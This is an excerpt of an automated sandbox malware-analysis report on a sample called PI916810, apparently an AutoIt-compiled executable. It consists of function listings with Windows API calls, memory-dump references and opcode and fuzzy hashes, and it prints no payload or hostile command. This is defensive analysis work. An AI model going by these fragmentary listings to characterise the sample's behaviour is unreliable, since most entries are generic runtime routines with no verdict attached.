                                                                                                                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1396898556-0
                                                                                                                                                                            • Opcode ID: a0a06703168afe9b7e96f63af4d312a3ef4203e2534b7b71595084f58bd14f0f
                                                                                                                                                                            • Instruction ID: 349326d0914f2f2a546d4dbda58cd4c7fecada66727a76ed5a4466608a660724
                                                                                                                                                                            • Opcode Fuzzy Hash: a0a06703168afe9b7e96f63af4d312a3ef4203e2534b7b71595084f58bd14f0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D11E731A00609AACF14BF72DC02FAE77A49F84705F10842FF541AB2C1EA799A05975A
                                                                                                                                                                            Function 004A01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                            • Opcode ID: 1c85b7c5740cf3dd7bd2ee465504dba4bffc30145a4a0183d62c0a2f41e2c445
                                                                                                                                                                            • Instruction ID: 6fe64ea80f88a0cabda1fc10615bd9be4f34817be2ab0cc55994d70900a1f73f
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c85b7c5740cf3dd7bd2ee465504dba4bffc30145a4a0183d62c0a2f41e2c445
                                                                                                                                                                            • Instruction Fuzzy Hash: 3021F0B4508341CFCB24DF14C844A1ABBE4BF85314F04896EE88A67761E73AE859CB5B
                                                                                                                                                                            Function 00465D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00465807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00465D76
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 70ee86c230223b52458438636ba2a46194284291a71cf9316e14fcda94fe37b1
                                                                                                                                                                            • Instruction ID: 050ea2d90b17b323437eee2bcd7ec16f6934b44980b4a252c1575d77ae63dbe1
                                                                                                                                                                            • Opcode Fuzzy Hash: 70ee86c230223b52458438636ba2a46194284291a71cf9316e14fcda94fe37b1
                                                                                                                                                                            • Instruction Fuzzy Hash: FB113A31200B059FD3308F15C484B67B7E5EF45750F10C92EE5AA86A90E778E945CB65
                                                                                                                                                                            Function 00465BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                                                            • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                                                                                                                                                            • Instruction ID: 8e269bc719bce3da0455fec78608cc20dabb59edc13a828abdadbc59befd6d64
                                                                                                                                                                            • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                                                                                                                                                            • Instruction Fuzzy Hash: C1017175600541ABC305EB6AC841D2AFBA9FF86314714815AE815C7702DB35EC21CBE5
                                                                                                                                                                            Function 00467F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                                                            • Opcode ID: afa7022badd1ca320fcd41164b148bf7cbd533a7763c9ccd7f4a3c956b31c337
                                                                                                                                                                            • Instruction ID: ac9511ff00fea7fd78178b0ca2eb517dffd4cc4521d9de08cd493495679f0494
                                                                                                                                                                            • Opcode Fuzzy Hash: afa7022badd1ca320fcd41164b148bf7cbd533a7763c9ccd7f4a3c956b31c337
                                                                                                                                                                            • Instruction Fuzzy Hash: 3001D672214701AED3246B29CC06F67BB98EB44764F10892FFA5ACB291EA75E4408759
                                                                                                                                                                            Function 00484A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __lock_file.LIBCMT ref: 00484AD6
                                                                                                                                                                              • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __getptd_noexit__lock_file
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2597487223-0
                                                                                                                                                                            • Opcode ID: f616c9884b79e56840eab3217dc5d5fa10b7561b6fb148123741eeb79f7548fd
                                                                                                                                                                            • Instruction ID: ccaed4ce8ad700d43a18559a07e60d059c424acd3d18d9d8c39822da44d3c6c2
                                                                                                                                                                            • Opcode Fuzzy Hash: f616c9884b79e56840eab3217dc5d5fa10b7561b6fb148123741eeb79f7548fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 5CF0A43194020A9BDF61BF768C0639F76A1AF80329F448D1EF8149A1D1DB7C8951DF59
                                                                                                                                                                            Function 00464FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464FDE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                            • Opcode ID: 7f44aff19146cd0e71b0b0f86a98d9014e04597a04b79840bc32d16417eb9f5b
                                                                                                                                                                            • Instruction ID: 1afc70cd5a0f134b5658d8cc4ca108dfdd64e1c2794b3fa4a30e3bb422ee45b6
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f44aff19146cd0e71b0b0f86a98d9014e04597a04b79840bc32d16417eb9f5b
                                                                                                                                                                            • Instruction Fuzzy Hash: DEF039B1105712CFCB389F64E494817BBF1BF443293208A7FE1D682A10E779A844DF4A
                                                                                                                                                                            Function 004809D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004809F4
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LongNamePath_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2514874351-0
                                                                                                                                                                            • Opcode ID: 13a5c6ddae6f50d738935408170488b8ca3d607a99fecd2c6af27be944780bdf
                                                                                                                                                                            • Instruction ID: b4a6f5dd978c65ff8f7b72a9715d6ed39e1d9650c60597de41bb9e30be432060
                                                                                                                                                                            • Opcode Fuzzy Hash: 13a5c6ddae6f50d738935408170488b8ca3d607a99fecd2c6af27be944780bdf
                                                                                                                                                                            • Instruction Fuzzy Hash: DBE07D3290022857C720D2589C05FFA77EDDF88394F0001F6FD0CC7205E964AC818694
                                                                                                                                                                            Function 004C9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                                                                                                                            • Instruction ID: a326d414ae9c1a62e75c0f741e38236df5c62a11d3d65417a6573f596a03b39e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                                                                                                                            • Instruction Fuzzy Hash: 3AE092B0104B005FEB749A24D815BE373E0BB06315F04081EF2DA83341EF667C41875D
                                                                                                                                                                            Function 00465DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0049E16B,?,?,00000000), ref: 00465DBF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: a9f5f12cba3d752d87cc223146b9630becf5f76c090f8f5e9ce8d77ab5c97467
                                                                                                                                                                            • Instruction ID: 69e4124741fb59f94e65bced6e52fdd4c42876bf9c14dbe17aaabf874543b263
                                                                                                                                                                            • Opcode Fuzzy Hash: a9f5f12cba3d752d87cc223146b9630becf5f76c090f8f5e9ce8d77ab5c97467
                                                                                                                                                                            • Instruction Fuzzy Hash: 73D0C77464020CBFE710DB80DC46FA9B77CD745711F100194FD0456290D6B27E548795
                                                                                                                                                                            Function 0048548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wfsopen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 197181222-0
                                                                                                                                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                            • Instruction ID: 9877bb735b6643e81d9f2fb83f0f5362524793e2b268453ee25f0832193e4a93
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB0927684020C77DF022E82EC02B593B199B40A78F808021FB0C18162A677A6A09689
                                                                                                                                                                            Function 004CD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 004CD46A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 2bb14a9223b9ac77e4b1bac1c3e73e4c9550877e3aabc8bcd1a20d3621c7edcc
                                                                                                                                                                            • Instruction ID: dc28d2eac1367144410f469f361efa08168d01b6dfb256e6cfbb072df9891bd8
                                                                                                                                                                            • Opcode Fuzzy Hash: 2bb14a9223b9ac77e4b1bac1c3e73e4c9550877e3aabc8bcd1a20d3621c7edcc
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A7162346043018FC754EF65C491F6AB7E0AF88318F04452EF9968B3A1DB78ED09CB5A
                                                                                                                                                                            Function 010FD970 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 010FD981
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                            • Instruction ID: 8342a9c57f0e38c12d8e82de3cd33e1773cf82dba8de628dce89ce41ff1bd6ba
                                                                                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE0E67494420DDFDB00EFF4D9496DE7FB4EF04301F100165FD05D2281D6309D508A62

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 004ECDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004ECE50
                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004ECE91
                                                                                                                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 004ECED6
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004ECF00
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ECF29
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004ECFA1
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 004ECFC2
                                                                                                                                                                            • GetKeyState.USER32(00000009), ref: 004ECFCF
                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004ECFE5
                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 004ECFEF
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004ED018
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED03F
                                                                                                                                                                            • SendMessageW.USER32(?,00001030,?,004EB602), ref: 004ED145
                                                                                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004ED15B
                                                                                                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004ED16E
                                                                                                                                                                            • SetCapture.USER32(?), ref: 004ED177
                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 004ED1DC
                                                                                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004ED1E9
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004ED203
                                                                                                                                                                            • ReleaseCapture.USER32 ref: 004ED20E
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004ED248
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004ED255
                                                                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 004ED2B1
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED2DF
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004ED31C
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED34B
                                                                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004ED36C
                                                                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 004ED37B
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004ED39B
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004ED3A8
                                                                                                                                                                            • GetParent.USER32(?), ref: 004ED3C8
                                                                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 004ED431
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED462
                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 004ED4C0
                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004ED4F0
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004ED51A
                                                                                                                                                                            • SendMessageW.USER32 ref: 004ED53D
                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 004ED58F
                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004ED5C3
                                                                                                                                                                              • Part of subcall function 004625DB: GetWindowLongW.USER32(?,000000EB), ref: 004625EC
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004ED65F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                            • String ID: @GUI_DRAGID$F$prR
                                                                                                                                                                            • API String ID: 3977979337-3452754240
                                                                                                                                                                            • Opcode ID: e1b8da45ee36ccc1ea2b3b157ba4804b2c5fa772616d17124aa6946d75ad4aa3
                                                                                                                                                                            • Instruction ID: 80f6e9c54f076fb7678184f78a3c0a6e6ac563eb3d06af4665864d12aa850ccb
                                                                                                                                                                            • Opcode Fuzzy Hash: e1b8da45ee36ccc1ea2b3b157ba4804b2c5fa772616d17124aa6946d75ad4aa3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4042BC30604280AFC725CF29C884FABBBE5FF49315F14052EF6958B3A1C7359846CB9A
                                                                                                                                                                            Function 004E804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004E873F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: %d/%02d/%02d
